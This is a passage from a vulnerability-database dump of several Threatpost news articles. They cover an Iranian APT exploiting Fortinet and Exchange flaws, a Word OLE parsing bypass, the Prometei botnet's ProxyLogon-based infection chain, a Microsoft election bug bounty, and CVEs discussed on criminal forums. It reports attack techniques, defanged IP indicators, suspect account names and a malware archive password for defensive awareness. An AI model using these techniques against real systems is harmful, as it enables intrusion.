below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:52", "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word attachments contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out on a bypass to allow this go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument). Streams can also contain information on macros in the document and the metadata of a document (i.e., title, author, creation date, etc.).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, it\u2019s offset computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. \u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: _\u201c_The bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n\n**_Follow all of Threatpost\u2019s RSA Conference 2019 coverage by visiting our [special coverage section](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage/>)._**\n", "cvss3": {}, "published": "2019-03-05T11:00:03", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2019-19781"], "modified": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-23T17:33:27", "description": "A heretofore little-seen botnet dubbed Prometei is taking a page from advanced persistent threat (APT) cyberattackers: The malware is exploiting two of the Microsoft Exchange vulnerabilities collectively known as ProxyLogon, in order to drop a Monero cryptominer on its targets.\n\nIt\u2019s also highly complex and sophisticated, researchers noted. While cryptojacking is its current game, Cybereason researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from the Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\n\u201cIf they wish to, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\u201d Cybereason researcher Lior Rochberger noted in [an analysis](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) released Thursday. \u201c[And] since cryptomining can be resource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business continuity.\u201d\n\nThe report noted that Cybereason has recently seen wide swathes of Prometei attacks on a variety of industries, including construction, finance, insurance, manufacturing, retail, travel and utilities. Geographically speaking, it has been observed infecting networks in the U.S., U.K. and many other European countries, as well as countries in South America and East Asia. It was also observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet-bloc countries.\n\n\u201cThe victimology is quite random and opportunistic rather than highly targeted, which makes it even more dangerous and widespread,\u201d Rochberger said.\n\n## **Exploiting Microsoft Exchange Security Bugs**\n\n[ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) consists of four flaws that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), or as in this case, [cryptominers](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>).\n\nMicrosoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nWhen it comes to Prometei, researchers have observed attacks against companies in North America making use of the ProxyLogon bugs tracked as CVE-2021-27065 and CVE-2021-26858. Both are post-authentication arbitrary file-write vulnerabilities in Exchange; once authenticated with an Exchange server, attackers could write a file to any path on the server \u2013 thus achieving RCE.\n\nThe attackers use the vulnerabilities to install and execute the China Chopper web shell, according to Rochberger. They then use [China Chopper to launch a PowerShell](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), which in turn downloads a payload from an attacker-controlled URL. That payload is then saved and executes, which ultimately starts the Prometei botnet execution.\n\n\u201cPrometei is a modular and multistage cryptocurrency botnet that was first discovered in July 2020 which has both Windows and Linux versions,\u201d explained Rochberger, who added that the botnet could extend back to 2016. \u201cThe latest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range of tasks that make mining Monero coins the least of the victims\u2019 concerns.\u201d\n\n## **Prometei Under the Hood**\n\nThe first module of the botnet, zsvc.exe, copies itself into C:\\Windows with the name \u201csqhost.exe,\u201d and then creates a firewall rule that will allow sqhost.exe to create connections over HTTP, according to the research. It also sets a registry key for persistence, and creates several other registry keys for later command-and-control (C2) communications by additional modules.\n\n\u201cSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands,\u201d according to the analysis. \u201cSqhost.exe is able to parse the prometei.cgi file from four different hardcoded C2 servers. The file contains the command to be executed on the machine. The commands can be used as standalone native OS commands\u2026or can be used to interact with the other modules of the malware.\u201d\n\nIt also controls the XMRig cryptominer that the malware installs on the machine, Cybereason noted. The commands on offer include the ability to execute a program or open a file; start or stop the mining process; download files; gather system information; check if a specific port is open; search for specific files or extensions; and update the malware \u2013 among other things.\n\n\u201cThe malware authors are able to add more modules and expand their capabilities easily, and potentially even shift to another payload objective, more destructive than just mining Monero,\u201d Rochberger warned.\n\nThe report noted that the execution of the malware also includes two other \u201ctree processes:\u201d cmd.exe and wmic.exe.\n\nWmic.exe is used to perform reconnaissance commands, including gathering the last time the machine was booted up, the machine model and more. Meanwhile Cmd.exe is used to block certain IP addresses from communicating with the machine.\n\n\u201cWe assess that those IP addresses are used by other malware, potentially miners, and the attackers behind Prometei wanted to ensure that all the resources of the network are available just for them,\u201d Rochberger explained.\n\n## **Lateral Malware Movement: Additional Malicious Modules**\n\nPrometei uses different techniques and tools, ranging from Mimikatz to the EternalBlue and BlueKeep exploits, along with other tools that all work together to propagate across the network, according to the analysis. To carry all of this out, the main botnet module downloads additional modules, including four main components:\n\n * exe\n * exe and an archived file, Netwalker.7z (7zip is used to extract the files in the archive)\n * exe\n * exe\n\nExchdefender masquerades as a made-up program called \u201cMicrosoft Exchange Defender.\u201d It constantly checks the files within a program files directory known to be used to host web shells, looking for one file in particular, according to Cybereason.\n\n\u201cThe malware is specifically interested in the file \u2018ExpiredPasswords.aspx\u2019 which was reported to be the name used to obscure the HyperShell backdoor used by [APT34 (aka. OilRig)](<https://threatpost.com/oilrig-apt-unique-backdoor/157646/>),\u201d Rochberger said. If the file exists, the malware immediately deletes it. Our assessment is that this tool is used to \u201cprotect\u201d the compromised Exchange Server by deleting potential WebShells so Prometei will remain the only malware using its resources.\u201d\n\nThe Netwalker.7z archive meanwhile is password-protected, using the password \u201chorhor123.\u201d The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a few DLLs,a copy of RdpcIip.exe and a few DLLs used by the bot components.\n\nRdcIip.exe is a key component of the malware, used for harvesting credentials and spreading laterally across the network, Rochberger explained. It also tries to propagate within the network environment by brute-forcing usernames and passwords using a built-in list of common combinations, he said.\n\nIf that doesn\u2019t work, it turns to the [SMB shared-drive exploit EternalBlue](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) to execute a shell code for installing the main bot module Sqhost.exe. To use the exploit, the malware downgrades the SMB protocol to SMB1, which is vulnerable to it. Cybereason also observed the module using the [Remote Desktop Protocol (RDP) exploit BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>).\n\nInterestingly, RdpcIip also can coordinate other components of the bot such as Windlver.exe, which is an OpenSSH and SSLib-based software that the attackers created so they can spread across the network using SSH, the report noted.\n\n\u201c[RdpcIip] has huge (trust us, huge) functionality with different branches with the main purpose being to interact with other components of the malware and make them work all together,\u201d Rochberger said.\n\nAnd finally, Miwalk.exe is a customized version of the Mimikatz credential-finding tool that RdpcIip.exe launches. The output is saved in text files and used by RdpcIip as it tries to validate the credentials and spread, according to the analysis.\n\n## **Taking a Page from APTs**\n\nThe group behind Prometei is financially motivated and operated by Russian-speaking individuals but is not backed by a nation-state, according to Cybereason. Nonetheless, the malware\u2019s sophistication and rapid incorporation of ProxyLogon exploits shows advanced capabilities that could make the botnet a serious danger in terms of espionage, information theft, follow-on malware and more, Rochberger warned.\n\n\u201cThreat actors in the cybercrime community continue to adopt APT-like techniques and improve the efficiency of their operations,\u201d he explained. \u201cPrometei is a complex and multistage botnet that, due to its stealth and wide range of capabilities, puts the compromised network at great risk\u2026The threat actors rode the wave of the recently discovered flaws and exploited them in order to penetrate targeted networks. We anticipate continued evolution of the advanced techniques being used by different threat actors for different purposes, including cybercrime groups.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-23T17:15:23", "type": "threatpost", "title": "Prometei Botnet Could Fire Up APT-Style Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T17:15:23", "id": "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "href": "https://threatpost.com/prometei-botnet-apt-attacks/165574/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-30T22:24:12", "description": "As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing \u201cend-to-end verification of elections.\u201d\n\nElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted.\n\nThe bounty program invites security researchers (\u201cwhether full-time cybersecurity professionals, part-time hobbyists or students\u201d) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). Eligible submissions with a \u201cclear, concise proof of concept\u201d (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren\u2019t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages).\n\nThe program is one prong of the company\u2019s wider \u201cDefending Democracy\u201d program, under which Microsoft has pledged to [protect campaigns from hacking](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>); increase political [advertising transparency](<https://threatpost.com/google-fine-privacy-gdpr/141055/>) online; explore ways to [protect electoral processes](<https://threatpost.com/voting-machines-hacked-with-ease-at-def-con/127101/>) with technology; and defend against [disinformation campaigns](<https://threatpost.com/twitter-5000-accounts-disinformation-campaigns/145764/>).\n\nResearchers said that the bug-bounty program is a welcome \u2013 if limited \u2013 addition to the private sector\u2019s response to election meddling. However, they also highlighted the need for a more holistic effort, united across both public and private organizations.\n\n\u201c[Russian interference in the 2016 election](<https://threatpost.com/justice-department-indicts-12-russian-nationals-tied-to-2016-election-hacking/133978/>) gave cybersecurity a quick moment in the political spotlight,\u201d Monique Becenti, product and channel specialist at SiteLock, told Threatpost. \u201cBut when the cost of cybercrime reaches billions of dollars each year, election security needs to be top of mind for our political leaders. Since 2016, election security bills have been slow-moving. Some companies, like Microsoft, are rallying the security industry to address this issue head-on. The ElectionGuard Bounty program is an important step in the right direction, but we need political leaders who will champion this issue and ensure constituents and our elections stay secure.\u201d\n\nNot everyone is excited about the move; Richard Gold, head of security engineering at Digital Shadows, said that the program is limited to Microsoft\u2019s proprietary solution, which makes its real-world impact limited at best.\n\n\u201cIt\u2019s great that companies like Microsoft are launching programs like this, but the question remains: how much is this kind of bug bounty going to be used?\u201d he told Threatpost. \u201cBug-bounty programs need to be applied consistently in order to have real impact. There is a trade off in time and resources that needs to be overcome in order for a program like this to be worthwhile.\u201d\n\n\u201cMicrosoft is committed to strengthening our partnership with the security research community as well as pursuing new areas for security improvement in emerging technology,\u201d said Jarek Stanley, senior program manager at the Microsoft Security Response Center, in [announcing the program](<https://msrc-blog.microsoft.com/2019/10/18/introducing-the-electionguard-bounty-program/>). \u201cWe look forward to sharing more bounty updates and improvements in the coming months.\u201d\n\nMicrosoft paid $4.4 million in bounty rewards between July 1, 2018 and June 30 across 11 bounty programs, with a top award of $200,000.\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-18T20:04:29", "type": "threatpost", "title": "Microsoft Tackles Election Security with Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-18T20:04:29", "id": "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "href": "https://threatpost.com/microsoft-election-security-bug-bounties/149347/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and 